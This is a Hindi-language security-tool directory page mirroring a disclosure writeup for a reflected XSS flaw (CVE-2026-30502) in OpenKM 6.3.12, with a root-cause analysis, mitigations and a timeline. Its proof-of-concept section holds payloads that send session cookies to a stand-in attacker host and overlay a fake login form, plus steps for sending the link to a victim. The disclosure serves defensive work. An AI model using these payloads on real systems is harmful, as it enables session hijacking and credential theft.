Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS | Kitploit
उपकरण/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
फ़िशिंग उपकरणभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
2 महीने पहलेअभी तक समीक्षित नहीं

🛡️ CVE-2026-30502 — OpenKM v6.3.12 में Reflected XSS (परावर्तित XSS)

CVE Badge OpenKM Type Disclosure Status

खोज एवं रिपोर्ट: Dharmendra Kumar — सुरक्षा शोधकर्ता

साइबर सुरक्षा | पैठ परीक्षण | भेद्यता अनुसंधान | जिम्मेदार प्रकटीकरण


📌 विषय-सूची

  • अवलोकन
  • CVE विवरण
  • प्रभावित उत्पाद
  • भेद्यता विवरण
  • मूल कारण विश्लेषण
  • प्रभाव एवं जोखिम मूल्यांकन
  • प्रमाण-अवधारणा (PoC)
  • निवारण एवं अनुशंसाएँ
  • प्रकटीकरण समयरेखा
  • संदर्भ
  • शोधकर्ता के बारे में

🔍 अवलोकन

यह रिपॉजिटरी CVE-2026-30502 के जिम्मेदार प्रकटीकरण का दस्तावेजीकरण करती है, जो OpenKM v6.3.12 में पाई गई एक Reflected Cross-Site Scripting (XSS) भेद्यता है — यह एक व्यापक रूप से तैनात ओपन-सोर्स दस्तावेज़ प्रबंधन प्रणाली है, जिसका उपयोग उद्यम और सरकारी वातावरणों में किया जाता है।

यह भेद्यता Content पैरामीटर में मौजूद है, जो उपयोगकर्ता-आपूर्ति इनपुट को उचित सैनिटाइज़ेशन या आउटपुट एन्कोडिंग के बिना सीधे ब्राउज़र में वापस परावर्तित कर देता है। एक हमलावर एम्बेडेड JavaScript युक्त एक दुर्भावनापूर्ण URL तैयार कर सकता है और सामाजिक इंजीनियरिंग के माध्यम से पीड़ित को उस पर क्लिक करने के लिए प्रेरित कर सकता है, जिसके परिणामस्वरूप पीड़ित के ब्राउज़र सत्र में स्क्रिप्ट निष्पादित हो जाती है।

⚠️ गंभीरता: मध्यम–उच्च | हमला वेक्टर: नेटवर्क | आवश्यक विशेषाधिकार: कोई नहीं | उपयोगकर्ता सहभागिता: आवश्यक


📋 CVE विवरण


📦 प्रभावित उत्पाद

OpenKM एक मुफ्त और ओपन-सोर्स दस्तावेज़ प्रबंधन प्रणाली (DMS) है, जो व्यावसायिक दस्तावेज़ों के प्रबंधन, ऑडिटिंग और वितरण के लिए एक वेब इंटरफ़ेस प्रदान करती है। इसका उपयोग दुनिया भर में उद्यमों, सरकारी निकायों और शैक्षणिक संस्थानों द्वारा किया जाता है।

  • उत्पाद नाम: OpenKM Document Management System
  • प्रभावित संस्करण: v6.3.12
  • विक्रेता वेबसाइट: https://www.openkm.com
  • श्रेणी: दस्तावेज़ प्रबंधन प्रणाली (DMS)
  • भाषा / स्टैक: Java (JSP / Spring Framework)

🧨 भेद्यता विवरण

Reflected Cross-Site Scripting (XSS) भेद्यता OpenKM v6.3.12 में Content पैरामीटर के माध्यम से पाई गई। एप्लिकेशन HTTP प्रतिक्रिया बॉडी में इनपुट को वापस परावर्तित करने से पहले उपयोगकर्ता-आपूर्ति इनपुट को मान्य (validate) या एन्कोड करने में विफल रहता है, जिससे मनमाना JavaScript इंजेक्ट किया जा सकता है और पीड़ित के ब्राउज़र में निष्पादित हो सकता है।

Stored XSS के विपरीत, Reflected XSS पेलोड डेटाबेस में संग्रहीत नहीं होता है — इसके बजाय, यह एक तैयार किए गए URL के भीतर सवार होता है। यह हमला पीड़ित को एक दुर्भावनापूर्ण लिंक पर क्लिक करने के लिए धोखा दिए जाने पर निर्भर करता है (ईमेल, सोशल मीडिया या फ़िशिंग अभियानों के माध्यम से वितरित), जिसके बाद पेलोड पीड़ित के सत्र संदर्भ के साथ उनके ब्राउज़र में चुपचाप निष्पादित हो जाता है।

हमला प्रवाह

root@kitploit:~
Attacker crafts malicious URL
        │
        ▼
Victim clicks the link (phishing / social engineering)
        │
        ▼
Browser sends GET/POST request with payload in `Content` parameter
        │
        ▼
OpenKM reflects unsanitized input directly into HTML response
        │
        ▼
Browser parses & executes injected JavaScript
        │
        ▼
Session hijacked / credentials harvested / account compromised

🔬 मूल कारण विश्लेषण

यह भेद्यता Content पैरामीटर पर इनपुट-आउटपुट सुरक्षा नियंत्रण लागू करने में एप्लिकेशन की विफलता का परिणाम है:

root@kitploit:~
User-Crafted URL ──► Content Parameter ──► [NO Validation]
       ──► Reflected in HTML Response ──► [NO Encoding]
              ──► Browser Executes Script ──► Account Compromised

💥 प्रभाव एवं जोखिम मूल्यांकन

इस भेद्यता का सफल शोषण निम्नलिखित परिणाम दे सकता है:


🧪 प्रमाण-अवधारणा (PoC)

⚠️ अस्वीकरण: निम्नलिखित जानकारी केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए जिम्मेदार प्रकटीकरण सिद्धांतों के तहत साझा की गई है। ऐसे सिस्टमों पर इसका परीक्षण या उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके मूल्यांकन के लिए आपके पास स्पष्ट लिखित प्राधिकरण नहीं है।

पेलोड उदाहरण (सामान्य)

root@kitploit:~
// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Credential phishing overlay
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

निर्मित दुर्भावनापूर्ण URL संरचना

root@kitploit:~
https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

पुनरुत्पादन के चरण

  1. OpenKM v6.3.12 में उस संवेदनशील एंडपॉइंट की पहचान करें जो Content पैरामीटर को परावर्तित करता है
  2. Content पैरामीटर में XSS पेलोड जोड़कर एक URL तैयार करें
  3. यदि आवश्यक हो तो पेलोड को URL-एन्कोड करें
  4. तैयार लिंक को ईमेल, चैट या किसी सामाजिक इंजीनियरिंग वेक्टर के माध्यम से पीड़ित को भेजें
  5. जब पीड़ित अपने प्रमाणित ब्राउज़र सत्र में लिंक खोलता है, तो पेलोड निष्पादित हो जाता है
  6. JavaScript निष्पादन, कुकी चोरी या रीडायरेक्ट व्यवहार का निरीक्षण करें

🛠️ निवारण एवं अनुशंसाएँ

डेवलपर्स / विक्रेताओं के लिए

सिस्टम प्रशासकों के लिए

  • 🔒 फ़ायरवॉल नियमों के माध्यम से OpenKM पहुँच को आंतरिक/विश्वसनीय नेटवर्क तक सीमित करें
  • 🛡️ XSS डिटेक्शन सिग्नेचर के साथ एक वेब एप्लिकेशन फ़ायरवॉल (WAF) प्रतिपूरक नियंत्रण के रूप में तैनात करें
  • 📊 क्वेरी स्ट्रिंग्स में अप्रत्याशित स्क्रिप्ट टैग या एन्कोडेड पेलोड के लिए वेब सर्वर एक्सेस लॉग की निगरानी करें
  • 🔄 OpenKM इंस्टॉलेशन को नवीनतम सुरक्षित रिलीज़ में अद्यतन रखें
  • 📧 उपयोगकर्ताओं को DMS के अवांछित लिंक पर क्लिक करने में सावधानी बरतने के लिए प्रशिक्षित करें

📅 प्रकटीकरण समयरेखा

इस पूरी प्रक्रिया के दौरान जिम्मेदार प्रकटीकरण के पूर्ण सिद्धांतों का पालन किया गया, जिसमें किसी भी सार्वजनिक रिलीज़ से पहले विक्रेता समन्वय और CVE कार्यक्रम से जुड़ाव शामिल है।


📚 संदर्भ

  • 🔗 MITRE CVE प्रविष्टि — CVE-2026-30502
  • 🔗 NVD — राष्ट्रीय भेद्यता डेटाबेस
  • 🔗 OpenKM आधिकारिक वेबसाइट
  • 🔗 OWASP XSS रोकथाम चीट शीट
  • 🔗 CWE-79: क्रॉस-साइट स्क्रिप्टिंग
  • 🔗 OWASP Top 10 — A03:2021 इंजेक्शन
  • 🔗 OWASP Java Encoder

👨‍💻 शोधकर्ता के बारे में

Dharmendra Kumar

सुरक्षा शोधकर्ता | पैठ परीक्षक | बग हंटर | CVE योगदानकर्ता

Dharmendra Kumar एक स्वतंत्र साइबर सुरक्षा शोधकर्ता हैं, जो वेब एप्लिकेशन सुरक्षा, पैठ परीक्षण और जिम्मेदार भेद्यता प्रकटीकरण में विशेषज्ञता रखते हैं। उनका शोध व्यापक रूप से उपयोग किए जाने वाले सॉफ़्टवेयर में वास्तविक दुनिया की सुरक्षा कमजोरियों की पहचान करने और उन्हें जिम्मेदारी से रिपोर्ट करने पर केंद्रित है — जो वैश्विक स्तर पर उपयोगकर्ताओं के लिए सुरक्षित एप्लिकेशन में योगदान देता है।

विशेषज्ञता के क्षेत्र:

  • 🌐 वेब एप्लिकेशन पैठ परीक्षण
  • 🐛 बग बाउंटी हंटिंग और CVE अनुसंधान
  • 🔍 भेद्यता खोज और सुरक्षा सलाहकार (Security Advisories)
  • 📋 जिम्मेदार प्रकटीकरण और समन्वित CVE रिपोर्टिंग

मुझसे जुड़ें:

GitHub LinkedIn Twitter Instagram Medium


⚖️ कानूनी अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और सूचनात्मक उद्देश्यों के लिए है। भेद्यता विवरण और प्रमाण-अवधारणा पेलोड जिम्मेदार प्रकटीकरण सिद्धांतों के अनुसार प्रकाशित किए गए हैं। लेखक इस जानकारी के किसी भी अनधिकृत उपयोग का समर्थन नहीं करता है और न ही उसकी जिम्मेदारी लेता है। किसी भी ऐसे सिस्टम पर सुरक्षा परीक्षण करने से पहले हमेशा स्पष्ट लिखित अनुमति प्राप्त करें जिसके आप स्वामी नहीं हैं।


🙏 आभार

विशेष धन्यवाद:

  • समन्वित प्रकटीकरण के दौरान सहयोग और प्रतिक्रिया के लिए OpenKM विकास टीम
  • CVE पहचानकर्ता को आवंटित और प्रबंधित करने के लिए MITRE CVE कार्यक्रम
  • एप्लिकेशन सुरक्षा का मानक लगातार ऊँचा उठाने के लिए वैश्विक सुरक्षा अनुसंधान और बग बाउंटी समुदाय

⭐ यदि यह शोध आपके काम आया, तो कृपया इस रिपॉजिटरी को स्टार करने पर विचार करें।

वेब को सभी के लिए सुरक्षित बनाने हेतु सुरक्षा अनुसंधान खुले तौर पर साझा किया जाता है।

© 2026 Dharmendra Kumar — सर्वाधिकार सुरक्षित

टूल डाउनलोड करें
फ़ील्डविवरण
CVE आईडीCVE-2026-30502
उत्पादOpenKM
प्रभावित संस्करणv6.3.12
भेद्यता श्रेणीReflected Cross-Site Scripting (XSS)
संवेदनशील पैरामीटरContent
CWECWE-79: Improper Neutralization of Input During Web Page Generation
CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
गंभीरतामध्यम–उच्च
प्रकाशकMITRE CVE Program
शोधकर्ताDharmendra Kumar
प्रकटीकरण प्रकारजिम्मेदार / समन्वित
कमजोरीविवरण
❌ कोई इनपुट सत्यापन नहींContent पैरामीटर बिना किसी प्रतिबंध या फ़िल्टरिंग के कच्चे HTML/JavaScript वर्णों को स्वीकार करता है
❌ कोई आउटपुट एन्कोडिंग नहींपरावर्तित मान बिना HTML-एंटिटी एन्कोडिंग के HTML प्रतिक्रिया में लिखे जाते हैं
❌ CSP हेडर अनुपस्थितइनलाइन स्क्रिप्ट निष्पादन को अवरुद्ध करने के लिए कोई Content Security Policy लागू नहीं है
❌ कोई HTTPOnly कुकीज़ नहींसत्र टोकन JavaScript के माध्यम से सुलभ हैं, जिससे सीधे कुकी चोरी संभव होती है
जोखिमविवरण
🍪 सत्र अपहरणdocument.cookie के माध्यम से सक्रिय सत्र टोकन चुराकर पीड़ित की पहचान में हेरफेर करना
🔑 क्रेडेंशियल चोरीप्लेनटेक्स्ट उपयोगकर्ता नाम और पासवर्ड कैप्चर करने के लिए नकली लॉगिन ओवरले इंजेक्ट करना
📤 सूचना प्रकटीकरणसंवेदनशील दस्तावेज़ सामग्री, उपयोगकर्ता डेटा या आंतरिक कॉन्फ़िगरेशन को बाहर निकालना (exfiltrate) करना
🎣 फ़िशिंग हमलेविश्वसनीय OpenKM डोमेन के भीतर होस्ट किए गए ठोस नकली पेज प्रस्तुत करना
👤 खाता अधिग्रहणपीड़ित की ओर से मनमाने प्रमाणित कार्य करना
⚙️ अनधिकृत कार्यDMS के भीतर दस्तावेज़ों को संशोधित, हटाना या बाहर निकालना
🖥️ मैलवेयर वितरणपीड़ितों को दुर्भावनापूर्ण डाउनलोड होस्ट करने वाली हमलावर-नियंत्रित साइटों पर पुनर्निर्देशित करना
अनुशंसाकार्यान्वयन
✅ इनपुट सत्यापनसभी उपयोगकर्ता-नियंत्रित पैरामीटरों से HTML विशेष वर्णों (<, >, ", ', ;) को अस्वीकार या हटाएँ
✅ आउटपुट एन्कोडिंगपरावर्तित डेटा प्रस्तुत करने से पहले OWASP Java Encoder जैसी लाइब्रेरी का उपयोग करके संदर्भ-जागरूक HTML एन्कोडिंग लागू करें
✅ सामग्री सुरक्षा नीतिसख्त CSP हेडर तैनात करें: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ HTTPOnly कुकीज़सभी सत्र कुकीज़ पर HttpOnly और Secure फ़्लैग सेट करें ताकि JavaScript पहुँच अवरुद्ध हो
✅ सुरक्षा लाइब्रेरीमजबूत सैनिटाइज़ेशन के लिए OWASP AntiSamy या DOMPurify एकीकृत करें
✅ अपग्रेडविक्रेता द्वारा जारी नवीनतम सुरक्षा पैच तुरंत लागू करें
दिनांकघटना
🔍 खोजOpenKM v6.3.12 के सुरक्षा मूल्यांकन के दौरान भेद्यता की पहचान
📧 विक्रेता सूचनाOpenKM सुरक्षा टीम को जिम्मेदार प्रकटीकरण रिपोर्ट प्रस्तुत की गई
🤝 विक्रेता स्वीकृतिOpenKM टीम ने भेद्यता रिपोर्ट स्वीकार की
📝 CVE असाइनमेंटMITRE CVE कार्यक्रम के माध्यम से CVE-2026-30502 आवंटित
🌐 सार्वजनिक प्रकटीकरणनिवारण अवधि के बाद समन्वित सार्वजनिक प्रकटीकरण